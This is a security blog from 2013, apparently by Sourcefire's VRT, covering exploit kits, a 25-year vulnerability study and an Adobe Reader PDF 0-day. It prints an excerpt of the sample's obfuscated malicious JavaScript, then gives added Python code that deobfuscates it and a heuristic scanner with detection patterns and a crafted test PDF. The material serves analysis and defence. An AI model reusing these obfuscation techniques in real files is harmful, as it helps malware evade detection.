Monday, February 25, 2013

Life Cycle and Detection of an Exploit Kit

Exploit kits may not be as hot a topic as the recently released Mandiant report, but they're still an important part of today's threat landscape. They are not only one of the more prevalent ways of dropping malware on end users; because a kit's commercial success funds its author (the Cool Exploit Kit's author, for example, has used its proceeds to buy vulnerabilities), they are also pushing defenders toward a future with more and more 0-days to worry about.

Those of you who would like to understand more about how these kits work should check out my recent presentation on the subject. It assumes no prior knowledge, so it's a good starting point even for management types who might not quite grasp the threat landscape.

For those of you running Sourcefire/Snort boxes who are looking for exploit kit coverage, be sure to review how many rules from our new Exploit-Kit category you have enabled. While 200 of the 222 rules in that category are in the balanced policy by default, if you're not running a current SEU you're missing a lot of powerful detection.

Wednesday, February 20, 2013

25 years of vulnerabilities: 1988-2012

We at the VRT are always interested in vulnerabilities and in information about them. To that end we recently dug into the NVD (the National Vulnerability Database), examined the data for the last 25 years, and used it to map out trends and general information on vulnerabilities in software.

Some of the questions we asked ourselves were:
  • What are the most popular vulnerabilities?
  • Which had the most impact?
  • Which vendors and products suffered from the most issues?
  • Which browser is the best in terms of vulnerabilities found?
  • How many 0-days are found in products?
While the answers to some of these questions are predictable, others are surprising.

We will be presenting the answers to these questions in a talk at RSA Conference San Francisco 2013. If you're attending RSA and are interested in the answers, please join us on March 1st at 9:00 AM. A report delving into the details will be released after the conference; you can pre-register here and you will receive a link to the report once it has been published.

UPDATE: the full report has now been released, download it here

Thursday, February 14, 2013

More Targeted PDF 0-Day

Much like other vendors in the security space, the VRT spent yesterday scrambling to address the latest Adobe Reader/PDF vulnerability. The attack, which works across multiple operating systems, bypasses Adobe's sandbox, and has been used in recent targeted campaigns, is still without a patch as Adobe mobilizes its response organization to address the matter.

Upon first opening the sample it was blatantly obvious that something fishy was going on: the first content in the file was a block of roughly 400K+ of highly obfuscated JavaScript, which begins like this (excerpt):

/JS (\n0 >> 0 >> 0 >> 0 >> 0 >> 0;\nfunction sHOGG\(c,d,e\){\n    var idx = d % c.length;\n    var s = "";\n    while \(s.length < c.length\){\n        s += c[idx];\n        idx = \(idx + e\) % c.length;\n    }\n    return s;\n}\n0 >> 0 >> 0 >> 0 >> 0 >> 0;\nfunction oTHERWISE\(pRENDENDO,t\){\n if\(pRENDENDO == sHOGG\('014.031.4.',3571,9173\)\){\n var r="";\nr+=ue\(t+2*2*2*3+11*3\);\nr+=ue\(t+11*5+2\);r+=ue\(t+19*3\);r+=ue\(t+3*19\);r+=ue\(t+19*3\);r+=ue\(t+43+7*2\);r+=ue\(t+11*2+5*7\);r+=ue\(t+19*3\);r+=ue\(t+3*3*2*2+7*3\);r+=ue\(t+11*3+2*2*3*2\);r+=ue\(t+2*7+43\);r+=ue\(t+19*3\);r+=ue\(t+3*19\);r+=ue\(t+19*3\);\nr+=ue\(t+19*3\);r+=ue\(t+3*19\);r+=ue\(t+31+13*2\);\nr+=ue\(t+19*3\);r+=ue\(t+5+2*2*13\);
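The excerpt already gives away two of the script's obfuscation tricks, and both can be undone statically. sHOGG(c, d, e) is a string permutation: it walks c starting at index d modulo the length and stepping by e, so with a step coprime to the length it just reorders the characters of a constant. The ue(t + 2*2*2*3+11*3) calls hide offsets behind arithmetic that folds to a single integer. The following is an added example, not code from the post or from the sample itself: a Python port of the permutation plus a constant folder, run over a fragment copied from the excerpt (the fragment keeps the backslash-escaped parentheses the PDF string syntax adds). The decoded literal is '10.0.1.434', a string shaped like an Adobe Reader version number, so the branch presumably selects version-specific offsets; that is an inference from the decoded value, not something the post states. Every ue() argument in the excerpt folds to t+57.

```python
# Added example (not code from the VRT post or from the sample): static
# deobfuscation of the two tricks visible in the excerpt, the sHOGG string
# permutation and the arithmetic-only ue(t+...) arguments, so the constants
# can be recovered without executing the malicious script.
import ast
import operator
import re
from typing import List


def shogg(c: str, d: int, e: int) -> str:
    """Python port of the sample's sHOGG(c, d, e).

    Starts at index d % len(c) and steps e positions (mod len(c)) until
    len(c) characters have been emitted. When e and len(c) are coprime this
    is a fixed permutation of c, so the original constant comes back intact.
    """
    n = len(c)
    idx = d % n
    out = []
    while len(out) < n:
        out.append(c[idx])
        idx = (idx + e) % n
    return "".join(out)


_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def fold(expr: str) -> int:
    """Constant-fold an integer expression built only from + - * and literals.

    Walks the ast instead of calling eval() so nothing but arithmetic runs.
    """
    def ev(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](ev(node.left), ev(node.right))
        raise ValueError(f"unsupported syntax in {expr!r}")
    return ev(ast.parse(expr, mode="eval").body)


# The script sits inside a PDF string literal, so parentheses appear as \( \).
SHOGG_CALL = re.compile(r"sHOGG\\?\('([^']*)',\s*(\d+),\s*(\d+)\\?\)")
UE_CALL = re.compile(r"ue\\?\(t\+([0-9+*\-\s]+)\\?\)")


def decode_shogg_calls(script: str) -> List[str]:
    """Decode every sHOGG('literal', d, e) call found in script."""
    return [shogg(m.group(1), int(m.group(2)), int(m.group(3)))
            for m in SHOGG_CALL.finditer(script)]


def fold_ue_offsets(script: str) -> List[int]:
    """Fold the arithmetic in every ue(t+<expr>) call down to a plain offset."""
    return [fold(m.group(1)) for m in UE_CALL.finditer(script)]


# Constructed sample: a fragment copied from the excerpt quoted in the post.
SAMPLE = r"""0 >> 0 >> 0 >> 0 >> 0 >> 0;
if\(pRENDENDO == sHOGG\('014.031.4.',3571,9173\)\){
 var r="";
r+=ue\(t+2*2*2*3+11*3\);
r+=ue\(t+11*5+2\);r+=ue\(t+19*3\);r+=ue\(t+3*19\);r+=ue\(t+43+7*2\);r+=ue\(t+11*2+5*7\);r+=ue\(t+31+13*2\);r+=ue\(t+5+2*2*13\);
"""

if __name__ == "__main__":
    print(decode_shogg_calls(SAMPLE))  # ['10.0.1.434']
    print(fold_ue_offsets(SAMPLE))     # [57, 57, 57, 57, 57, 57, 57, 57]
```

The `0 >> 0 >> 0;` statements are no-ops inserted as padding; they carry no logic and are simply noise for a signature writer to look past. The same ast-based folder handles any of the `a*b+c` style arguments in the full script, but it deliberately refuses anything that is not plain integer arithmetic rather than falling back to eval().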

We're currently testing signatures that would detect files like these on a generic level. While JavaScript in PDFs is nothing new, that script is typically small, well-defined, and a much smaller fraction of the overall file size. In the meantime, today we are releasing SIDs 25818 and 25819 to counter this particular threat, and 25817 to detect command and control traffic associated with this campaign.
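The generic approach described above, as an added example that is not the VRT's signature logic (the SIDs mentioned are not published here): pull every direct /JS (...) string literal out of a PDF, measure how much of the file is script, and count two obfuscation tells present in the sample, the no-op `0 >> 0 >> ...` statements and call arguments that are pure integer arithmetic. The minimal PDFs, the scripts and the thresholds are constructed for the example and are not tuned on real traffic.

```python
# Added example (not the VRT's signatures): a file-level heuristic in the
# spirit of the generic detection the post describes. It extracts direct
# /JS (...) string literals, computes the script-to-file size ratio, and
# counts two obfuscation tells seen in the sample. Thresholds are illustrative.
import re
from dataclasses import dataclass
from typing import List


def extract_js_literals(pdf: bytes) -> List[bytes]:
    """Return the body of each /JS (...) literal string in pdf.

    Follows the PDF string rules that matter here: a backslash escapes the
    next byte, and unescaped parentheses nest. Scripts held in a stream
    object (/JS 12 0 R, often FlateDecode'd) are not handled; use a real
    PDF parser for those.
    """
    bodies = []
    for m in re.finditer(rb"/JS\s*\(", pdf):
        i, depth, buf = m.end(), 1, bytearray()
        while i < len(pdf):
            ch = pdf[i:i + 1]
            if ch == b"\\":            # keep escape and escaped byte verbatim
                buf += pdf[i:i + 2]
                i += 2
                continue
            if ch == b"(":
                depth += 1
            elif ch == b")":
                depth -= 1
                if depth == 0:
                    break
            buf += ch
            i += 1
        bodies.append(bytes(buf))
    return bodies


# "0 >> 0 >> 0;" padding statements, and calls like ue\(t+11*2+5*7\) whose
# argument is a name plus composite integer arithmetic.
JUNK_STMT = re.compile(rb"(?:0\s*>>\s*)+0\s*;")
ARITH_ARG = re.compile(rb"\w+\\?\(\s*\w+\s*\+\s*\d+(?:\s*[*+]\s*\d+)+\s*\\?\)")


@dataclass
class Verdict:
    file_bytes: int
    js_bytes: int
    js_ratio: float
    junk_stmts: int
    arith_args: int
    suspicious: bool


def score_pdf(pdf: bytes, min_js_bytes: int = 4096,
              min_ratio: float = 0.5, min_tells: int = 5) -> Verdict:
    """Flag a PDF whose script is both large relative to the file and obfuscated."""
    js = b"".join(extract_js_literals(pdf))
    ratio = len(js) / len(pdf) if pdf else 0.0
    junk = len(JUNK_STMT.findall(js))
    arith = len(ARITH_ARG.findall(js))
    flagged = (len(js) >= min_js_bytes and ratio >= min_ratio
               and junk + arith >= min_tells)
    return Verdict(len(pdf), len(js), ratio, junk, arith, flagged)


def build_pdf(js: bytes) -> bytes:
    """Constructed minimal PDF whose OpenAction runs js (test data only)."""
    return (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"3 0 obj << /Type /Action /S /JavaScript /JS (" + js + b") >> endobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


# Constructed scripts: a typical small form script, and a 17,000-byte script
# in the style of the sample (parentheses escaped as PDF strings require).
BENIGN_JS = b"app.alert\\('Thanks for opening the form'\\);"
OBFUSCATED_JS = (b"0 >> 0 >> 0 >> 0 >> 0 >> 0;\\n"
                 b"r+=ue\\(t+19*3\\);r+=ue\\(t+43+7*2\\);r+=ue\\(t+11*2+5*7\\);\\n") * 200

if __name__ == "__main__":
    for name, js in (("benign", BENIGN_JS), ("obfuscated", OBFUSCATED_JS)):
        print(name, score_pdf(build_pdf(js)))
```

Two caveats before using anything like this in production. First, real samples frequently put the script in a compressed stream rather than a direct literal, so the extractor must decode FlateDecode (and other filters) before the ratio means anything. Second, the size-ratio threshold needs tuning against legitimate form-heavy PDFs, which can carry substantial AcroForm scripting; the obfuscation tells are what keep those from tripping the rule.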